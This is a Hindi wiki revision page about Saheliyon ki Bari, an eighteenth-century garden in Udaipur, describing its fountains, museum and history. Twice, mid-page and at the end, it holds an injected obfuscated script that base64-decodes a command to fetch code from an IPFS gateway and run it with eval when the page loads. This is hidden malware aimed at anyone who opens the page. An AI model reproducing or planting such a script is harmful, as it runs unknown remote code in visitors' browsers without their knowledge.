Difference between revisions of "सहेलियों की बाड़ी उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
 
(12 intermediate revisions by 6 users not shown)
Line 1: Line 1:
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है और [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।  
+
{{सूचना बक्सा पर्यटन
*उदयपुर में सहेलियों की बाड़ी और दासियों के सम्मान में बना बाग एक सजा-धजा बाग है।
+
|चित्र=Saheliyon-Ki-Bari-Udaipur.jpg
*इस बाग में कमल के तालाब, फव्वारे, संगमरमर के [[हाथी]] और कियोस्क <ref>(kiosques / Kiosk - 'कियोस्क' हवादार छतरी, बरसाती जैसे निर्माण को कहते हैं यह गोल भी हो सकता है और षटकोणीय या पंच कोणीय भी।)</ref> बने हुए हैं।
+
|चित्र का नाम=सहेलियों की बाड़ी, उदयपुर
 +
|विवरण='[[सहेलियों की बाड़ी उदयपुर|सहेलियों की बाड़ी]]' [[राजस्थान]] के [[उदयपुर]] में स्थित एक ख़ूबसूरत बाग़ है।
 +
|राज्य=[[राजस्थान]]
 +
|ज़िला=[[उदयपुर]]
 +
|निर्माता=[[राणा संग्राम सिंह]]
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=18 वीं सदी
 +
|स्थापना=
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|यातायात=
 +
|हवाई अड्डा=
 +
|रेलवे स्टेशन=
 +
|बस अड्डा=
 +
|कैसे पहुँचें=
 +
|क्या देखें=
 +
|कहाँ ठहरें=
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=
 +
|ए.टी.एम=
 +
|सावधानी=
 +
|मानचित्र लिंक=[https://www.google.co.in/maps/dir/Udaipur,+Rajasthan/Sahelion+Ki+Bari,+Udaipur,+Rajasthan+313001/@24.596514,73.6932034,14.68z/data=!4m13!4m12!1m5!1m1!1s0x3967e56550a14411:0xdbd8c28455b868b0!2m2!1d73.712479!2d24.585445!1m5!1m1!1s0x3967ef878151b84b:0x9ea1fcdf206d5644!2m2!1d73.686047!2d24.6030575 गूगल मानचित्र उदयपुर]
 +
|संबंधित लेख= [[राजस्थान]], [[राजस्थान पर्यटन]], [[उदयपुर]], [[कमल]], [[श्रावण मास]], [[अमावस्या]], [[राणा संग्राम सिंह]]
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=बगीचे में एक छोटा-सा संग्रहालय है, जहाँ शाही परिवार की वस्तुओं का एक विशाल संग्रह प्रदर्शित है। संग्रहालय के अलावा यहाँ एक [[गुलाब]] के फूलों का बगीचा और [[कमल]] के तालाब हैं। उद्यान रोज सुबह नौ बजे से शाम के छ: बजे के बीच तक आगंतुकों के लिए खुला रहता है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''सहेलियों की बाड़ी''' [[राजस्थान]] के ख़ूबसूरत शहर [[उदयपुर]] में स्थित एक बाग़ है। इस बाग़ में [[कमल]] के तालाब, फ़व्वारे, संगमरमर के [[हाथी]] और 'कियोस्क'<ref>kiosques/Kiosk-'कियोस्क' हवादार छतरी या बरसाती जैसे निर्माण को कहते हैं, यह गोल भी हो सकता है और षटकोणीय या पंच कोणीय भी।</ref> बने हुए हैं। इस उद्यान का मुख्य आकर्षण यहाँ के फ़व्वारे हैं, जिनके बारे में कहा जाता है कि इन्हें [[इंग्लैण्ड]] से मंगवाया गया था। [[श्रावण मास]] की [[अमावस्या]] के अवसर पर इस बाड़ी में नगर निवासियों का एक बड़ा मेला भी लगता है।
 +
==निर्माण काल==
 +
सहेलियों की बाड़ी का निर्माण [[राणा संग्राम सिंह]] द्वारा शाही महिलाओं के लिए 18वीं सदी में करवाया गया था। उद्यान के बारे में यह कहा जाता है कि राणा ने इस सुरम्य उद्यान को स्वयं तैयार किया था और अपनी रानी को भेंट किया, जो [[विवाह]] के बाद अपनी 48 नौकरानियों के साथ आई थी। 'फतेह सागर झील' के किनारे पर स्थित यह जगह अपने ख़ूबसूरत झरनें, हरे-भरे बगीचे और संगमरमर के काम के लिए विख्यात है।
 +
====मुख्य आकर्षण====
 +
इस उद्यान के मुख्य आकर्षण फ़व्वारे हैं, जो इंग्लैण्ड से आयात किए गए थे। सभी फ़व्वारे पक्षियों की चोंच के आकार की आकृति से पानी निकलते हुये बने हैं। फ़व्वारे के चारों ओर काले पत्थर का बना रास्ता है। बगीचे में एक छोटा-सा संग्रहालय है, जहाँ शाही परिवार की वस्तुओं का एक विशाल संग्रह प्रदर्शित है। संग्रहालय के अलावा यहाँ एक [[गुलाब]] के फूलों का बगीचा और [[कमल]] के तालाब हैं। उद्यान रोज सुबह नौ बजे से शाम के छ: बजे के बीच तक आगंतुकों के लिए खुला रहता है।
 +
 
 +
{{लेख प्रगति |आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक=|पूर्णता= |शोध=}}
 +
==विथिका==
 +
<center>
 +
सहेलियों की बाड़ी
 +
<gallery>
 +
चित्र:Saheliyon-Ki-Bari-3.jpg
 +
चित्र:Saheliyon-Ki-Bari-4.jpg ‎
 +
चित्र:Saheliyon-Ki-Bari-5.jpg ‎
 +
चित्र:Saheliyon-Ki-Bari-6.jpg ‎  ‎
 +
चित्र:Saheliyon-Ki-Bari-7.jpg ‎
 +
</gallery>
 +
</center>
  
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
 
+
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:उदयपुर]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:उदयपुर]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__
+
__INDEX__
 +
__NOTOC__

Latest revision as of 09:21, 8 September 2016

saheliyoan ki ba di udayapur
vivaran 'saheliyoan ki ba di' rajasthan ke udayapur mean sthit ek khoobasoorat bag hai.
rajy rajasthan
zila udayapur
nirmata rana sangram sianh
nirman kal 18 vian sadi
chitr:Map-icon.gif googal manachitr udayapur
sanbandhit lekh rajasthan, rajasthan paryatan, udayapur, kamal, shravan mas, amavasya, rana sangram sianh


any janakari bagiche mean ek chhota-sa sangrahalay hai, jahaan shahi parivar ki vastuoan ka ek vishal sangrah pradarshit hai. sangrahalay ke alava yahaan ek gulab ke phooloan ka bagicha aur kamal ke talab haian. udyan roj subah nau baje se sham ke chh: baje ke bich tak agantukoan ke lie khula rahata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

saheliyoan ki ba di rajasthan ke khoobasoorat shahar udayapur mean sthit ek bag hai. is bag mean kamal ke talab, favvare, sangamaramar ke hathi aur 'kiyosk'[1] bane hue haian. is udyan ka mukhy akarshan yahaan ke favvare haian, jinake bare mean kaha jata hai ki inhean ianglaind se mangavaya gaya tha. shravan mas ki amavasya ke avasar par is ba di mean nagar nivasiyoan ka ek b da mela bhi lagata hai.

nirman kal

saheliyoan ki ba di ka nirman rana sangram sianh dvara shahi mahilaoan ke lie 18vian sadi mean karavaya gaya tha. udyan ke bare mean yah kaha jata hai ki rana ne is suramy udyan ko svayan taiyar kiya tha aur apani rani ko bheant kiya, jo vivah ke bad apani 48 naukaraniyoan ke sath aee thi. 'phateh sagar jhil' ke kinare par sthit yah jagah apane khoobasoorat jharanean, hare-bhare bagiche aur sangamaramar ke kam ke lie vikhyat hai.

mukhy akarshan

is udyan ke mukhy akarshan favvare haian, jo ianglaind se ayat kie ge the. sabhi favvare pakshiyoan ki choanch ke akar ki akriti se pani nikalate huye bane haian. favvare ke charoan or kale patthar ka bana rasta hai. bagiche mean ek chhota-sa sangrahalay hai, jahaan shahi parivar ki vastuoan ka ek vishal sangrah pradarshit hai. sangrahalay ke alava yahaan ek gulab ke phooloan ka bagicha aur kamal ke talab haian. udyan roj subah nau baje se sham ke chh: baje ke bich tak agantukoan ke lie khula rahata hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

vithika

saheliyoan ki ba di

tika tippani aur sandarbh

  1. kiosques/Kiosk-'kiyosk' havadar chhatari ya barasati jaise nirman ko kahate haian, yah gol bhi ho sakata hai aur shatakoniy ya panch koniy bhi.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>